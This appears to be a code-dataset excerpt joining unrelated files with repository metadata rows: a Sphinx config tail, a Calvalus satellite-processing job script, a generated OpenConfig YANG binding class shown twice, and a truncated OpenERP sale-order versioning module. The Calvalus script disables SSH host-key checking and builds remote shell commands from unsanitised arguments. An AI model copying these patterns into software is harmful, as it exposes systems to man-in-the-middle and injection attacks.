# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'aiodjango', 'aiodjango Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'aiodjango', 'aiodjango Documentation',
author, 'aiodjango', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
| bsd-2-clause | 206,612,260,978,442,800 | 31.319444 | 79 | 0.707563 | false |
bcdev/snap-cawa | src/main/calvalus/cawa-inst/bin/lc2-step.py | 1 | 16258 | #!/usr/bin/python
import os
import sys
from pstep import PStep
import paramiko
cmd = sys.argv[1]
ps = PStep('CALVALUS')
# lc2-step ql noaa11 AVHRR_AC 1993 /calvalus/eodata/AVHRR_L1B/noaa11/1993 /calvalus/projects/lc/ql-noaa11-AVHRR_L1B/1993
if cmd == 'ql-orbit':
variables = {
'mission' : sys.argv[2],
'sensor' : sys.argv[3],
'year' : sys.argv[4],
'input' : sys.argv[5],
'output' : sys.argv[6],
'bands' : 'counts_1,counts_2,counts_4'
}
request = ps.apply_template(cmd, variables, sys.argv[2] + '-' + sys.argv[3] + '-' + sys.argv[4])
ps.submit_request(request)
# lc2-step era-interim proba 2009-01-01 2009-01-31 /calvalus/eodata/PROBAV_S1_TOA/v2/2009/01 /calvalus/projects/lc/era-interim-proba/2009/01
elif cmd == 'era-interim':
year = sys.argv[3][:4]
month = sys.argv[3][5:7]
variables = {
'resolution' : sys.argv[2],
'start' : sys.argv[3],
'stop' : sys.argv[4],
'input' : sys.argv[5][:-8],
'output' : sys.argv[6],
'year' : year,
'month' : month
}
request = ps.apply_template(cmd, variables, sys.argv[2] + '-' + year + '-' + month)
ps.submit_request(request)
# lc2-step sdr fr 2009-01-01 2009-01-31 default /calvalus/inventory/MER_FSG_1P/v2013/2009 /calvalus/eodata/MER_FSG_1P/v2013/2009/01 /calvalus/projects/lc/sdr-fr/2009/01 [/calvalus/projects/lc/sdr-fr/2009]
elif cmd == 'sdr':
year = sys.argv[3][:4]
month = sys.argv[3][5:7]
template = { 'fr': 'sdr',
'rr': 'sdr',
'spot': 'sdr-spot',
'proba': 'sdr-proba',
'avhrr11': 'sdr-avhrr',
'avhrr14': 'sdr-avhrr',
'avhrr': 'sdr-avhrr',
'avhrr2': 'sdr-avhrr' }[sys.argv[2]]
variables = {
'resolution' : sys.argv[2],
'start' : sys.argv[3],
'stop' : sys.argv[4],
'useUclCloudForShadow' : sys.argv[5]=='default',
'inventory' : sys.argv[6],
'input' : sys.argv[7][:-8],
'output' : sys.argv[8],
'year' : year,
'month' : month
}
request = ps.apply_template(template, variables, sys.argv[2] + '-' + sys.argv[5] + '-' + year + '-' + month)
ps.submit_request(request)
# lc2-step.py ncformat fr 2009-01-01 default /calvalus/projects/lc/sdr-fr/2009/01 /calvalus/projects/lc/sdr-fr-nc/2009/01
elif cmd == 'ncformat':
year = sys.argv[3][:4]
month = sys.argv[3][5:7]
pattern = { 'fr': 'L2_of_MER_..._1P....${yyyy}${MM}${dd}_.*.seq',
'rr': 'L2_of_MER_..._1P....${yyyy}${MM}${dd}_.*.seq',
'avhrr11': 'L2_of_ao11${MM}${dd}.*.seq',
'avhrr14': 'L2_of_ao14${MM}${dd}.*.seq',
'spot': 'L2_of_V.KRNP____${yyyy}${MM}${dd}F.*.seq',
'proba': 'L2_of_PROBAV_S1_TOA_......_${yyyy}${MM}${dd}.*.seq' }[sys.argv[2]]
variables = {
'resolution' : sys.argv[2],
'input' : sys.argv[5],
'output' : sys.argv[6],
'year' : year,
'month' : month,
'pattern' : pattern
}
request = ps.apply_template(cmd, variables, sys.argv[2] + '-' + sys.argv[4] + '-' + year + '-' + month)
ps.submit_request(request)
# lc2-step.py sr fr 2010-01-01 2010-01-07 default /calvalus/projects/lc/sdr-fr/2010 /calvalus/projects/lc/sr-fr-default/2010
elif cmd == 'sr':
year = sys.argv[3][:4]
pattern = { 'fr': 'L2_of_MER_..._1P....${yyyy}${MM}${dd}_.*.seq',
'rr': 'L2_of_MER_..._1P....${yyyy}${MM}${dd}_.*.seq',
'avhrr11': 'ao11${MM}${dd}.*.nc',
'avhrr14': 'ao14${MM}${dd}.*.nc',
'avhrr': 'L2_of_ao..${MM}${dd}.*.nc',
'spot': 'L2_of_V.KRNP____${yyyy}${MM}${dd}F.*.seq',
'proba': 'L2_of_PROBAV_S1_TOA_......_${yyyy}${MM}${dd}.*.seq' }[sys.argv[2]]
variables = {
'resolution' : sys.argv[2],
'RESOLUTION' : { 'fr': 'FR',
'rr': 'RR',
'spot': 'SPOT',
'proba': 'PROBA',
'avhrr11': 'HRPT',
'avhrr14': 'HRPT',
'avhrr': 'HRPT' }[sys.argv[2]],
'start' : sys.argv[3],
'stop' : sys.argv[4],
'filter' : sys.argv[5],
'input' : sys.argv[6][:sys.argv[6].rfind('/')],
'output' : sys.argv[7]+'/l3-',
'year' : year,
'pattern' : pattern
}
request = ps.apply_template('sr', variables, sys.argv[2] + '-' + sys.argv[3] + '-' + sys.argv[5])
ps.submit_request(request)
# lc2-step.py nccopy fr 2003-01-01 2003-01-31 default /calvalus/projects/lc/sr-fr-default/2003 /calvalus/projects/lc/sr-fr-nc-classic/2003
elif cmd == 'nccopy':
year = sys.argv[3][:4]
variables = {
'resolution' : sys.argv[2],
'start' : sys.argv[3],
'stop' : sys.argv[4],
'input' : sys.argv[6][:sys.argv[6].rfind('/')],
'output' : sys.argv[7]
}
request = ps.apply_template(cmd, variables, sys.argv[2] + '-' + sys.argv[3] + '-' + sys.argv[5])
ps.submit_request(request)
# lc2-step.py qll3 spot 2012-02-12 2012-02-18 7 default /calvalus/projects/lc/sr-spot-default/2012 /calvalus/projects/lc/ql-sr-spot-default/2012
elif cmd == 'qll3':
year = sys.argv[3][:4]
redband = { 'fr': 'sr_3_mean',
'rr': 'sr_3_mean',
'spot': 'sr_B0_mean',
'proba': 'sr_1_mean',
'avhrr11': 'sr_1_mean',
'avhrr14': 'sr_1_mean',
'avhrr': 'sr_1_mean' }
greenband = { 'fr': 'sr_5_mean',
'rr': 'sr_5_mean',
'spot': 'sr_B2_mean',
'proba': 'sr_2_mean',
'avhrr11': 'sr_2_mean',
'avhrr14': 'sr_2_mean',
'avhrr': 'sr_2_mean' }
blueband = { 'fr': 'sr_7_mean',
'rr': 'sr_7_mean',
'spot': 'sr_B3_mean',
'proba': 'sr_3_mean',
'avhrr11': 'bt_4_mean',
'avhrr14': 'bt_4_mean',
'avhrr': 'bt_4_mean' }
variables = {
'resolution' : sys.argv[2],
'RESOLUTION' : { 'fr': 'FR',
'rr': 'RR',
'spot': 'SPOT',
'proba': 'PROBA',
'avhrr11': 'HRPT',
'avhrr14': 'HRPT',
'avhrr': 'HRPT' }[sys.argv[2]],
'start' : sys.argv[3],
'stop' : sys.argv[4],
'periodLength' : sys.argv[5],
'input' : sys.argv[7],
'output' : sys.argv[8],
'year' : year,
'maskexpr' : 'current_pixel_state == 1 or current_pixel_state == 3',
'redband' : redband[sys.argv[2]],
'greenband' : greenband[sys.argv[2]],
'blueband' : blueband[sys.argv[2]]
}
request = ps.apply_template(cmd, variables, sys.argv[2] + '-' + sys.argv[3] + '-' + sys.argv[6])
ps.submit_request(request)
# lc2-step.py ql-avhrr-coverage noaa11 1993-01-01 1993-01-31 /calvalus/eodata/AVHRR_L1B/noaa11/1993/01 /calvalus/projects/lc/ql-avhrr-coverage/1993/01
elif cmd == 'ql-avhrr-coverage':
year = sys.argv[3][:4]
month = sys.argv[3][5:7]
variables = {
'platform' : sys.argv[2],
'start' : sys.argv[3],
'stop' : sys.argv[4],
'input' : sys.argv[5][:-8],
'output' : sys.argv[6],
'year' : year,
'month' : month
}
request = ps.apply_template(cmd, variables, year + '-' + month)
ps.submit_request(request)
# lc2-step avhrr-idepix noaa14 1997-05-01 1997-05-31 /calvalus/eodata/AVHRR_L1B/noaa14/1997/05 /calvalus/projects/lc/avhrr-idepix/1997/05
elif cmd == 'avhrr-idepix':
year = sys.argv[3][:4]
month = sys.argv[3][5:7]
variables = {
'platform' : sys.argv[2],
'start' : sys.argv[3],
'stop' : sys.argv[4],
'input' : sys.argv[5][:-8],
'output' : sys.argv[6],
'year' : year,
'month' : month
}
request = ps.apply_template(cmd, variables, year + '-' + month)
ps.submit_request(request)
# lc2-step.py seasonal-compositing fr 2009-12-03-P17W 2009-12-03 2010-04-01 120 /calvalus/eodata/MERIS_SR_FR/v1.0/2009 /calvalus/projects/lc/seasonal-fr/2009/2009-12-03-P17W
elif cmd == 'seasonal-compositing':
if sys.argv[2] == 'fr' or sys.argv[2] == 'proba':
rows = '64800'
else:
rows = '16200'
variables = {
'resolution' : sys.argv[2],
'rows' : rows,
'season' : sys.argv[3],
'start' : sys.argv[4],
'stop' : sys.argv[5],
'period' : sys.argv[6],
'input' : sys.argv[7][:-5],
'output' : sys.argv[-1]
}
request = ps.apply_template(cmd, variables, sys.argv[2]+'-'+sys.argv[3])
ps.submit_request(request)
# lc2-step.py seasonal-formatting fr 2009-12-03-P17W 2009-12-03 2010-04-01 /calvalus/projects/lc/seasonal-fr/2009/2009-12-03-P17W /calvalus/projects/lc/seasonal-fr-geotiff/2009/2009-12-03-P17W
elif cmd == 'seasonal-formatting':
variables = {
'resolution' : sys.argv[2],
'season' : sys.argv[3],
'start' : sys.argv[4],
'stop' : sys.argv[5],
'input' : sys.argv[6],
'output' : sys.argv[7]
}
request = ps.apply_template(cmd, variables, sys.argv[2]+'-'+sys.argv[3])
ps.submit_request(request)
# lc2-step.py qa-table fr 2009 /calvalus/eodata/MER_FRS_1P/v2013/2009 /calvalus/projects/lc/qa-fr/2009
elif cmd == 'qa-table':
variables = {
'resolution' : sys.argv[2],
'year' : sys.argv[3],
'input' : sys.argv[4],
'output' : sys.argv[5]
}
request = ps.apply_template(cmd, variables, sys.argv[2]+'-'+sys.argv[3])
ps.submit_request(request)
# lc2-step.py mask noaa11 1992 /calvalus/eodata/AVHRR_L1B/noaa11/1992 /calvalus/projects/lc/mask-noaa11/1992
elif cmd == 'qa-mask':
variables = {
'resolution' : sys.argv[2],
'year' : sys.argv[3],
'input' : sys.argv[4],
'output' : sys.argv[5]
}
request = ps.apply_template(cmd, variables, sys.argv[2] + '-' + sys.argv[3])
ps.submit_request(request)
# lc2-step qa-ql noaa11 1993 /calvalus/projects/lc/mask-noaa11/1992 /calvalus/projects/lc/qlm-noaa11/1992
elif cmd == 'qa-ql':
variables = {
'resolution' : sys.argv[2],
'year' : sys.argv[3],
'input' : sys.argv[4],
'output' : sys.argv[5]
}
request = ps.apply_template(cmd, variables, sys.argv[2] + '-' + sys.argv[3])
ps.submit_request(request)
# lc2-step.py destitching noaa11 1993 05 31 /calvalus/eodata/AVHRR_L1B/noaa11/1993/05 /calvalus/projects/lc/destitching/noaa11-list/1993/05
elif cmd == 'destitching':
variables = {
'resolution' : sys.argv[2],
'year' : sys.argv[3],
'month' : sys.argv[4],
'lastdayofmonth' : sys.argv[5],
'input' : sys.argv[6][:-8],
'output' : sys.argv[7]
}
request = ps.apply_template(cmd, variables, sys.argv[2]+'-'+sys.argv[3]+'-'+sys.argv[4])
ps.submit_request(request)
# lc2-step.py addheader noaa11 1993 05 /calvalus/projects/lc/destitching/noaa11-list/1993/05 /calvalus/projects/lc/destitching/noaa11-table/1993/05
elif cmd == 'addheader':
resolution = sys.argv[2]
year = sys.argv[3]
month = sys.argv[4]
csvlist = sys.argv[5] + '/part-r-00000'
tableDir = sys.argv[6][:-8]
table = tableDir + '/avhrr-' + resolution + '-' + year + '-' + month + '.csv'
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect('feeder01.bc.local', username=os.getlogin())
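    # The remote one-liner below prepends the fixed CSV header line to the
    # part-r-00000 listing produced by the destitching step and writes the
    # result as the per-month table consumed by the later subsetting step.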
ssh.exec_command('bash -c \'mkdir -p ' + tableDir + '; rm -f ' + table + '; echo "product output startLine numLines subsetX subsetY subsetWidth subsetHeight" | cat - ' + csvlist + ' > ' + table + '\'')
# lc2-step.py addl2of noaa11 1993 05 /calvalus/projects/lc/destitching/noaa11-table/1993/05 /calvalus/projects/lc/destitching/noaa11-table2/1993/05
elif cmd == 'addl2of':
resolution = sys.argv[2]
year = sys.argv[3]
month = sys.argv[4]
tableDir = sys.argv[5][:-8]
table = tableDir + '/avhrr-' + resolution + '-' + year + '-' + month + '.csv'
table2Dir = sys.argv[6][:-8]
table2 = table2Dir + '/avhrr-l2-' + resolution + '-' + year + '-' + month + '.csv'
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect('feeder01.bc.local', username=os.getlogin())
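    # The sed pipeline below rewrites each row so it points at the L2
    # products under the ac-avhrr*-default-nc project tree instead of the
    # L1B inputs: product names gain an 'L2_of_L2_of_' prefix, the eodata
    # path is remapped, and the '.l1b' suffix becomes '.nc'.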
ssh.exec_command('bash -c \'mkdir -p ' + table2Dir + '; rm -f ' + table2 + '; cat ' + table + ' | sed -e "s,ao,L2_of_L2_of_ao,g" -e "s,/calvalus/eodata/AVHRR_L1B/noaa\\(..\\)/\\(....\\)/\\(..\\)/..,/calvalus/projects/lc/ac-avhrr\\1-default-nc/\\2/\\3," -e "s,.l1b,.nc,g" > ' + table2 + '\'')
# lc2-step.py subsetting noaa11 1993 05 /calvalus/eodata/AVHRR_L1B/noaa11/1993/05 /calvalus/projects/lc/destitching/noaa11-table/1993/05 /calvalus/projects/lc/destitching/noaa11-albedo2/1993/05
elif cmd == 'subsetting':
variables = {
'resolution' : sys.argv[2],
'year' : sys.argv[3],
'month' : sys.argv[4],
'table' : sys.argv[6][:-7] + 'avhrr-' + sys.argv[2] + '-' + sys.argv[3] + '-' + sys.argv[4] + '.csv',
'output' : sys.argv[7]
}
request = ps.apply_template(cmd, variables, sys.argv[2]+'-'+sys.argv[3]+'-'+sys.argv[4])
ps.submit_request(request)
# lc2-step.py subsetting2 noaa14 1996 06 /calvalus/projects/lc/ac-avhrr14-default-nc/1996/06 /calvalus/projects/lc/destitching/noaa14-table2/1996/06 /calvalus/projects/lc/ac-subsets-noaa14/1996/06
elif cmd == 'subsetting2':
variables = {
'resolution' : sys.argv[2],
'year' : sys.argv[3],
'month' : sys.argv[4],
'table' : sys.argv[6][:-7] + 'avhrr-l2-' + sys.argv[2] + '-' + sys.argv[3] + '-' + sys.argv[4] + '.csv',
'output' : sys.argv[7]
}
request = ps.apply_template(cmd, variables, sys.argv[2]+'-'+sys.argv[3]+'-'+sys.argv[4])
ps.submit_request(request)
# lc2-step.py correlating noaa11 1993 05 /calvalus/projects/lc/destitching/noaa11-albedo2/1993/05 /calvalus/projects/lc/destitching/noaa11-tiepoints/1993/05
elif cmd == 'correlating':
variables = {
'resolution' : sys.argv[2],
'year' : sys.argv[3],
'month' : sys.argv[4],
'input' : sys.argv[5],
'output' : sys.argv[6]
}
request = ps.apply_template(cmd, variables, sys.argv[2]+'-'+sys.argv[3]+'-'+sys.argv[4])
ps.submit_request(request)
# lc2-step.py warping noaa14 1996 06 /calvalus/projects/lc/ac-subsets-noaa14/1996/06 /calvalus/projects/lc/destitching/noaa14-tiepoints/1996/06 /calvalus/projects/lc/ac-warped-noaa14/1996/06
elif cmd == 'warping':
variables = {
'resolution' : sys.argv[2],
'year' : sys.argv[3],
'month' : sys.argv[4],
'input' : sys.argv[5],
'tiepoints' : sys.argv[6],
'output' : sys.argv[7]
}
request = ps.apply_template(cmd, variables, sys.argv[2]+'-'+sys.argv[3]+'-'+sys.argv[4])
ps.submit_request(request)
# lc2-step lcac noaa14 1996-06-01 1996-06-30 default /calvalus/projects/lc/sdr-noaa14-default-nc/1996/06 /calvalus/projects/lc/ac-noaa14-default-nc/1996/06
elif cmd == 'lcac':
year = sys.argv[3][:4]
month = sys.argv[3][5:7]
variables = {
'resolution' : sys.argv[2],
'start' : sys.argv[3],
'stop' : sys.argv[4],
'input' : sys.argv[6],
'output' : sys.argv[7],
'year' : year,
'month' : month
}
request = ps.apply_template(cmd, variables, sys.argv[2] + '-' + year + '-' + month)
ps.submit_request(request)
# lc2-step qamerge noaa14 1996-06-01 1996-06-30 /calvalus/projects/lc/ac-noaa14-default-nc/1996/06 /calvalus/projects/lc/ac-noaa14-default-qa/1996/06
elif cmd == 'qamerge':
year = sys.argv[3][:4]
month = sys.argv[3][5:7]
variables = {
'resolution' : sys.argv[2],
'start' : sys.argv[3],
'stop' : sys.argv[4],
'input' : sys.argv[6],
'output' : sys.argv[7],
'year' : year,
'month' : month
}
request = ps.apply_template(cmd, variables, sys.argv[2] + '-' + year + '-' + month)
ps.submit_request(request)
else:
print 'unknown command', cmd
sys.exit(1)
| gpl-3.0 | -4,678,787,371,043,600,000 | 35.617117 | 295 | 0.548161 | false |
napalm-automation/napalm-yang | napalm_yang/models/openconfig/network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/opaque_lsa/extended_prefix/tlvs/tlv/prefix_sid/__init__.py | 1 | 12436 | # -*- coding: utf-8 -*-
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improvement)
if six.PY3:
import builtins as __builtin__
long = int
elif six.PY2:
import __builtin__
from . import state
class prefix_sid(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa-types/lsa-type/lsas/lsa/opaque-lsa/extended-prefix/tlvs/tlv/prefix-sid. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: State parameters relating to the Prefix SID sub-TLV of the
extended prefix LSA
"""
__slots__ = ("_path_helper", "_extmethods", "__state")
_yang_name = "prefix-sid"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__state = YANGDynClass(
base=state.state,
is_container="container",
yang_name="state",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"protocols",
"protocol",
"ospfv2",
"areas",
"area",
"lsdb",
"lsa-types",
"lsa-type",
"lsas",
"lsa",
"opaque-lsa",
"extended-prefix",
"tlvs",
"tlv",
"prefix-sid",
]
def _get_state(self):
"""
Getter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/opaque_lsa/extended_prefix/tlvs/tlv/prefix_sid/state (container)
YANG Description: State parameters relating to the Prefix SID sub-TLV of the
extended prefix LSA
"""
return self.__state
def _set_state(self, v, load=False):
"""
Setter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/opaque_lsa/extended_prefix/tlvs/tlv/prefix_sid/state (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_state is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_state() directly.
YANG Description: State parameters relating to the Prefix SID sub-TLV of the
extended prefix LSA
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=state.state,
is_container="container",
yang_name="state",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """state must be of a type compatible with container""",
"defined-type": "container",
"generated-type": """YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=False)""",
}
)
self.__state = t
if hasattr(self, "_set"):
self._set()
def _unset_state(self):
self.__state = YANGDynClass(
base=state.state,
is_container="container",
yang_name="state",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
state = __builtin__.property(_get_state)
_pyangbind_elements = OrderedDict([("state", state)])
from . import state
class prefix_sid(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance-l2 - based on the path /network-instances/network-instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa-types/lsa-type/lsas/lsa/opaque-lsa/extended-prefix/tlvs/tlv/prefix-sid. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: State parameters relating to the Prefix SID sub-TLV of the
extended prefix LSA
"""
__slots__ = ("_path_helper", "_extmethods", "__state")
_yang_name = "prefix-sid"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__state = YANGDynClass(
base=state.state,
is_container="container",
yang_name="state",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"protocols",
"protocol",
"ospfv2",
"areas",
"area",
"lsdb",
"lsa-types",
"lsa-type",
"lsas",
"lsa",
"opaque-lsa",
"extended-prefix",
"tlvs",
"tlv",
"prefix-sid",
]
def _get_state(self):
"""
Getter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/opaque_lsa/extended_prefix/tlvs/tlv/prefix_sid/state (container)
YANG Description: State parameters relating to the Prefix SID sub-TLV of the
extended prefix LSA
"""
return self.__state
def _set_state(self, v, load=False):
"""
Setter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/opaque_lsa/extended_prefix/tlvs/tlv/prefix_sid/state (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_state is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_state() directly.
YANG Description: State parameters relating to the Prefix SID sub-TLV of the
extended prefix LSA
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=state.state,
is_container="container",
yang_name="state",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """state must be of a type compatible with container""",
"defined-type": "container",
"generated-type": """YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=False)""",
}
)
self.__state = t
if hasattr(self, "_set"):
self._set()
def _unset_state(self):
self.__state = YANGDynClass(
base=state.state,
is_container="container",
yang_name="state",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=False,
)
state = __builtin__.property(_get_state)
_pyangbind_elements = OrderedDict([("state", state)])
| apache-2.0 | -17,502,674,820,547,928 | 36.345345 | 375 | 0.571727 | false |
dhp-denero/LibrERP | sale_order_version/sale.py | 1 | 6008 | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2004-2012 Pexego Sistemas Informáticos. All Rights Reserved
# $Alejandro Núñez Liz$
# $Omar Castiñeira Saavedra$
#
# Copyright (C) 2014 Didotech srl (<http://www.didotech.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import orm, fields
from tools import ustr
class sale_order_line(orm.Model):
_inherit = "sale.order.line"
_columns = {
#'active': fields.related('order_id', 'active', type='boolean', string='Active', store=False),
'sale_line_copy_id': fields.many2one('sale.order.line', 'Orig version', required=False, readonly=False),
}
def copy_data(self, cr, uid, line_id, defaults=None, context=None):
defaults = defaults or {}
defaults['sale_line_copy_id'] = line_id
return super(sale_order_line, self).copy_data(cr, uid, line_id, defaults, context)
def copy(self, cr, uid, line_id, defaults, context=None):
defaults = defaults or {}
defaults['sale_line_copy_id'] = line_id
return super(sale_order_line, self).copy(cr, uid, line_id, defaults, context)
class sale_order(orm.Model):
""" Modificaciones de sale order para añadir la posibilidad de versionar el pedido de venta. """
_inherit = "sale.order"
def action_previous_version(self, cr, uid, ids, default=None, context=None):
if not default:
default = {}
if not context:
context = {}
attachment_obj = self.pool['ir.attachment']
orders = self.browse(cr, uid, ids, context=context)
order_ids = []
for order in orders:
vals = {
'version': (order.version and order.version or 1) + 1,
}
if not order.sale_version_id:
vals['sale_version_id'] = order.id
context['versioning'] = True
vals['name'] = (order.sale_version_id and order.sale_version_id.name or order.name) + u" V." + ustr(vals['version'])
new_order_id = self.copy(cr, uid, order.id, vals, context=context)
attachment_ids = attachment_obj.search(cr, uid, [('res_model', '=', 'sale.order'), ('res_id', '=', order.id)])
if attachment_ids:
attachment_obj.write(cr, uid, attachment_ids, {'res_id': new_order_id, 'res_name': vals['name']})
order.write({'active': False})
order_ids.append(new_order_id)
mod_obj = self.pool['ir.model.data']
res = mod_obj.get_object_reference(cr, uid, 'sale', 'view_order_form')
res_id = res and res[1] or False,
return {
'name': 'Sale Order',
'view_type': 'form',
'view_mode': 'form',
'view_id': res_id,
'res_model': 'sale.order',
'type': 'ir.actions.act_window',
'nodestroy': True,
'target': 'current',
'res_id': order_ids and order_ids[0] or False,
}
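    # Illustrative example: versioning order "SO012" archives it
    # (active=False) and creates a copy named "SO012 V.2" whose
    # sale_version_id points back at the original; versioning that copy in
    # turn yields "SO012 V.3", and so on.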
def _get_version_ids(self, cr, uid, ids, field_name, arg, context=None):
if context is None:
context = {}
res = {}
for sale in self.browse(cr, uid, ids):
if sale.sale_version_id:
res[sale.id] = self.search(cr, uid, ['|', ('sale_version_id', '=', sale.sale_version_id.id), ('id', '=', sale.sale_version_id.id), ('version', '<', sale.version), '|', ('active', '=', False), ('active', '=', True)])
else:
res[sale.id] = []
return res
_columns = {
'sale_version_id': fields.many2one('sale.order', 'Orig version', required=False, readonly=False),
'version': fields.integer('Version no.', readonly=True),
'active': fields.boolean('Active', readonly=False, help="It indicates that the sales order is active."),
'version_ids': fields.function(_get_version_ids, method=True, type="one2many", relation='sale.order', string='Versions', readonly=True)
}
_defaults = {
'active': True,
'version': 0,
'name': '/',
}
def create(self, cr, uid, vals, context=None):
if vals.get('name', '/') == '/':
shop = self.pool['sale.shop'].browse(cr, uid, vals['shop_id'], context=context)
if shop and shop.sequence_id:
sequence = self.pool['ir.sequence'].next_by_id(cr, uid, shop.sequence_id.id)
vals.update({'name': sequence})
else:
sequence = self.pool['ir.sequence'].get(cr, uid, 'sale.order')
